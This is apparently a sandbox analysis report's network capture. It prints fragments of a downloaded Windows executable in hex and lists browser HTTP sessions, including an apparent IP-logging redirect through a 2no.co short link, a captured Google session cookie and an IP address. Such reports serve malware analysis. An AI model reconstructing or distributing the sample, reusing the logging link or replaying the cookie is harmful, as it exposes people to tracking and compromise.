                                                                                                                                                    Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 1f 00 94 82 5b 61 fa d1 5b 61 fa d1 5b 61 fa d1 52 19 7e d1 59 61 fa d1 52 19 6f d1 5c 61 fa d1 52 19 79 d1 4d 61 fa d1 52 19 69 d1 4a 61 fa d1 5b 61 fb d1 98 61 fa d1 34 17 64 d1 59 61 fa d1 34 17 50 d1 5f 61 fa d1 34 17 51 d1 6a 61 fa d1 34 17 60 d1 5a 61 fa d1 34 17 67 d1 5a 61 fa d1 52 69 63 68 5b 61 fa d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b3 be 2e 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 7a 02 00 00 ba 00 00 00 00 00 00 f8 7b 02 00 00 10 00 00 00 90 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 03 00 00 04 00 00 f5 8d 12 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 b5 02 00 b4 00 00 00 00 00 03 00 51 40 00 00 00 00 00 00 00 00 00 00 3f 59 12 00 e8 27 00 00 00 50 03 00 38 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 02 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1f 78 02 00 00 10 00 00 00 7a 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6a 35 00 00 00 90 02 00 00 36 00 00 00 7e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 2b 00 00 00 d0 02 00 00 06 00 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 51 40 00 00 00 00 03 00 00 42 00 00 00 ba 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 15 00 00 00 50 03 00 00 16 00 00 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii: MZ`@!L!Require Windows$[a[a[aR~YaRo\aRyMaRiJa[aa4dYa4P_a4Qja4`Za4gZaRich[aPEL.`z{@p@TQ@?Y'P8.textxz `.rdataj56~@@.data+@.rsrcQ@B@@.reloc`P@B
                                                                                                                                                    Feb 21, 2024 08:14:08.072328091 CET1286INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii: UMMMMj$fE}tMEEEMUPMPhPfE}tM(E
                                                                                                                                                    Feb 21, 2024 08:14:08.072341919 CET1286INData Raw: 33 c0 8b e5 5d c2 0c 00 cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 0c 50 8b 4d 08 51 e8 10 00 00 00 83 c4 08 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a 10 8b 45 0c 50 8b 4d 08 51 e8 26 62 02 00 83 c4 0c f7 d8 1b c0 83 c0 01 5d c3 cc cc
                                                                                                                                                    Data Ascii: 3]UEPMQ]UjEPMQ&b]UQEHMUEBE]U8EBE8]MMUPXBEMQUPMQEUEP=URMM=
                                                                                                                                                    Feb 21, 2024 08:14:08.072357893 CET1286INData Raw: fc 83 c0 06 50 68 5c 94 42 00 e8 2d fd ff ff 83 c4 08 e9 b8 fd ff ff 68 b4 96 42 00 8b 4d fc 83 c1 02 51 e8 b4 1e 00 00 83 c4 08 f7 d8 1b c0 f7 d8 74 42 8b 55 fc 0f b7 42 06 83 f8 30 74 0c 8b 4d fc 0f b7 51 06 83 fa 31 75 25 8b 45 fc 0f b7 48 08
                                                                                                                                                    Data Ascii: Ph\B-hBMQtBUB0tMQ1u%EH wURh,B_;hBEPVt"MQ wjBs!hBEPt7MQ0|&EH9URB
                                                                                                                                                    Feb 21, 2024 08:14:08.072375059 CET1286INData Raw: 8b 55 0c 81 e2 00 00 01 00 75 0b 8b 45 b0 0d 00 01 00 00 89 45 b0 8d 4d f4 51 8b 55 08 52 e8 23 1a 00 00 83 c4 08 50 8d 4d e8 e8 77 fe ff ff 8d 4d f4 e8 2f ba 00 00 85 c0 75 1c c7 45 a8 01 00 00 00 8d 4d e8 e8 dc 2d 01 00 8d 4d f4 e8 d4 2d 01 00
                                                                                                                                                    Data Ascii: UuEEMQUR#PMwM/uEM-M-E{MEMEEPBt=MujURLBEPPBEM{-Ms-EEM_-MW-E]UEEE
                                                                                                                                                    Feb 21, 2024 08:14:08.072390079 CET1286INData Raw: 8d 4d f0 e8 98 f8 ff ff b8 01 00 00 00 85 c0 0f 84 da 00 00 00 8d 4d ec 51 8d 4d f0 e8 ff ee ff ff 50 e8 29 28 00 00 83 c4 08 89 45 fc 83 7d fc 00 75 74 8b 55 10 83 c2 02 89 55 10 8b 45 10 0f b7 08 83 f9 30 7c 0b 8b 55 10 0f b7 02 83 f8 39 7e 2c
                                                                                                                                                    Data Ascii: MMQMP)(E}utUUE0|U9~,Ma|Ez~UA|2MZ'EPMMRMEcHEPMQjUREPM/PMN(E\BMMME
                                                                                                                                                    Feb 21, 2024 08:14:08.072527885 CET1286INData Raw: 08 83 c0 2c 50 8d 4d d0 51 ff 15 24 90 42 00 eb 4a 8b 55 08 8b 45 c0 89 42 2c 8b 4d c4 89 4a 30 eb 39 6a 66 8b 55 08 8b 02 8b 4d 08 51 8b 50 1c ff d2 89 85 6c ff ff ff 8d 4d b8 e8 fa 09 00 00 8d 4d f4 e8 d2 23 01 00 8d 4d e0 e8 ea 09 00 00 8b 85
                                                                                                                                                    Data Ascii: ,PMQ$BJUEB,MJ09jfUMQPlMM#MlCEx4t~M P#u9jhMEPJhMMx#MhdMsMK#McdU,RM &
                                                                                                                                                    Feb 21, 2024 08:14:08.072550058 CET1286INData Raw: 00 74 71 8b 15 50 d4 42 00 89 55 f0 8b 45 f0 83 e8 01 89 45 f0 83 7d f0 69 77 3d 8b 4d f0 0f b6 91 ec 2e 40 00 ff 24 95 d8 2e 40 00 6a 11 6a 00 e8 0f 85 00 00 83 c4 08 eb 30 6a 12 6a 00 e8 01 85 00 00 83 c4 08 eb 22 6a 13 6a 00 e8 f3 84 00 00 83
                                                                                                                                                    Data Ascii: tqPBUEE}iw=M.@$.@jj0jj"jjPBPjj@E=@B=LBtMQLBR,Bt}t^E%=tMQj!j|6Uu=BtE%P B
                                                                                                                                                    Feb 21, 2024 08:14:08.072559118 CET1286INData Raw: ec 51 89 4d fc 33 c0 8b 4d fc 66 89 01 33 d2 8b 45 fc 66 89 50 02 8b 4d fc c7 41 08 00 00 00 00 8b 45 fc 8b e5 5d c3 cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 4d fc e8 71 6d 01 00 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51
                                                                                                                                                    Data Ascii: QM3Mf3EfPMAE]UQMMqm]UQMEQM-]UQMEE]UQME@@MQURMd6]UQMEPM6]UE
                                                                                                                                                    Feb 21, 2024 08:14:08.072590113 CET1286INData Raw: c0 01 50 8d 4d ec e8 dd fd ff ff 50 8b 4d f8 83 c1 01 51 ff 15 44 90 42 00 8d 4d ec e8 97 fd ff ff 8d 4d ec e8 1f a1 00 00 89 45 fc c7 45 e8 00 00 00 00 eb 09 8b 55 e8 83 c2 01 89 55 e8 81 7d e8 ff 0f 00 00 7d 4d 8b 45 fc 83 c0 0f 50 8d 4d ec e8
                                                                                                                                                    Data Ascii: PMPMQDBMMEEUU}}MEPMEMQUREMARBM<MP@BuEPMM`E]UQEPXBEMQXB;E|$UREPMQPBuU
                                                                                                                                                    Feb 21, 2024 08:14:08.287698030 CET1286INData Raw: 00 00 75 0e 8b 4d 08 51 e8 55 ff ff ff 83 c4 04 eb 38 83 3d 88 d4 42 00 02 75 2a 8b 55 0c 52 8d 85 bc fd ff ff 50 ff 15 50 90 42 00 85 c0 7c 07 b8 01 00 00 00 eb 13 8b 4d 08 51 e8 22 ff ff ff 83 c4 04 eb 05 b8 01 00 00 00 8b e5 5d c3 cc cc cc cc
                                                                                                                                                    Data Ascii: uMQU8=Bu*URPPB|MQ"]UjEP\BuIHBE}tMQ B3.UR@BE}tEuMQ B3]UM2jjMPMP`BE}


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    0192.168.2.549708104.21.79.2294437220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-02-21 07:14:05 UTC655OUTGET /2ZrVm4 HTTP/1.1
                                                                                                                                                    Host: 2no.co
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-02-21 07:14:06 UTC1184INHTTP/1.1 302 Found
                                                                                                                                                    Date: Wed, 21 Feb 2024 07:14:06 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    location: http://www.google.com/
                                                                                                                                                    set-cookie: 528326243210798046=2; expires=Fri, 21 Feb 2025 07:14:06 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                                    set-cookie: clhf03028ja=191.96.227.222; expires=Fri, 21 Feb 2025 07:14:06 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                                    memory: 0.4249114990234375
                                                                                                                                                    expires: Wed, 21 Feb 2024 07:14:06 +0000
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    strict-transport-security: max-age=604800
                                                                                                                                                    strict-transport-security: max-age=31536000
                                                                                                                                                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yLeIVJnsiH94cj8nvKEDm3wCAHXfEvAWuMVqfY2vbtd99QCd3Dcia4BXBNsFAJ4qrUKzyML1naqWsm%2BmnUG%2BaufzRc4IxGvQ3Mr8ZG8Aw2M9EAmU6YkhJ2o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 858d30c34e5b7cff-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    2024-02-21 07:14:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    1192.168.2.549711142.251.163.844437220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-02-21 07:14:05 UTC680OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                                                                                                                    Host: accounts.google.com
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Content-Length: 1
                                                                                                                                                    Origin: https://www.google.com
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4
                                                                                                                                                    2024-02-21 07:14:05 UTC1OUTData Raw: 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-02-21 07:14:06 UTC1798INHTTP/1.1 200 OK
                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                    Access-Control-Allow-Origin: https://www.google.com
                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                    Date: Wed, 21 Feb 2024 07:14:06 GMT
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce--WDdll2M8JIHNKsSv3FMOQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                    reporting-endpoints: default="/_/IdentityListAccountsHttp/web-reports?context=eJzjMtDikmLw1JBiOHxtB5Meyy0mIyCe2_2UaSEQH4x7znQUiHf4eLA4pc9gDQBiIW6OfUevrWMTmPHwjiYAn-gXZw"
                                                                                                                                                    Server: ESF
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Connection: close
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    2024-02-21 07:14:06 UTC23INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                                                                                                                                    Data Ascii: 11["gaia.l.a.r",[]]
                                                                                                                                                    2024-02-21 07:14:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    2192.168.2.549710142.251.40.1744437220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-02-21 07:14:05 UTC752OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                                                                                                                    Host: clients2.google.com
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Goog-Update-Interactivity: fg
                                                                                                                                                    X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                                                                                                                                                    X-Goog-Update-Updater: chromecrx-117.0.5938.132
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-02-21 07:14:06 UTC732INHTTP/1.1 200 OK
                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-wLoHULx8mYfFYN3RwuaqAA' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                    Date: Wed, 21 Feb 2024 07:14:06 GMT
                                                                                                                                                    Content-Type: text/xml; charset=UTF-8
                                                                                                                                                    X-Daynum: 6259
                                                                                                                                                    X-Daystart: 83646
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    Server: GSE
                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Connection: close
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    2024-02-21 07:14:06 UTC520INData Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 36 32 35 39 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 38 33 36 34 36 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                                                                                                                                    Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="6259" elapsed_seconds="83646"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                                                                                                                                    2024-02-21 07:14:06 UTC200INData Raw: 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f 67 75 70 64 61 74 65 3e 0d 0a
                                                                                                                                                    Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
                                                                                                                                                    2024-02-21 07:14:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    3192.168.2.54971223.51.58.94443
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-02-21 07:14:06 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                    User-Agent: Microsoft BITS/7.8
                                                                                                                                                    Host: fs.microsoft.com
                                                                                                                                                    2024-02-21 07:14:06 UTC495INHTTP/1.1 200 OK
                                                                                                                                                    ApiVersion: Distribute 1.1
                                                                                                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                    Server: ECAcc (chd/073D)
                                                                                                                                                    X-CID: 11
                                                                                                                                                    X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                    X-Ms-Region: prod-eus-z1
                                                                                                                                                    Cache-Control: public, max-age=130296
                                                                                                                                                    Date: Wed, 21 Feb 2024 07:14:06 GMT
                                                                                                                                                    Connection: close
                                                                                                                                                    X-CID: 2


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    4192.168.2.54971323.51.58.94443
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-02-21 07:14:06 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                    Range: bytes=0-2147483646
                                                                                                                                                    User-Agent: Microsoft BITS/7.8
                                                                                                                                                    Host: fs.microsoft.com
                                                                                                                                                    2024-02-21 07:14:06 UTC456INHTTP/1.1 200 OK
                                                                                                                                                    ApiVersion: Distribute 1.1
                                                                                                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                    Server: ECAcc (chd/0778)
                                                                                                                                                    X-CID: 11
                                                                                                                                                    Cache-Control: public, max-age=130265
                                                                                                                                                    Date: Wed, 21 Feb 2024 07:14:06 GMT
                                                                                                                                                    Content-Length: 55
                                                                                                                                                    Connection: close
                                                                                                                                                    X-CID: 2
                                                                                                                                                    2024-02-21 07:14:06 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                    Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    5192.168.2.549714142.250.65.2284437220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-02-21 07:14:06 UTC846OUTGET / HTTP/1.1
                                                                                                                                                    Host: www.google.com
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4
                                                                                                                                                    2024-02-21 07:14:07 UTC1845INHTTP/1.1 302 Found
                                                                                                                                                    Location: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGL7F1q4GIjBwAWbomQLbaJKyWdrTAZ9MKsU5Vq2-V7iqyHfa4-ZPY5fgDT5PQDrRGB3-eVas0UEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                                    x-hallmonitor-challenge: CgsIv8XWrgYQxKuRcBIEv2Dj3g
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-vyTCCSOVhsiFrVdJ8FkPLg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]}
                                                                                                                                                    Permissions-Policy: unload=()
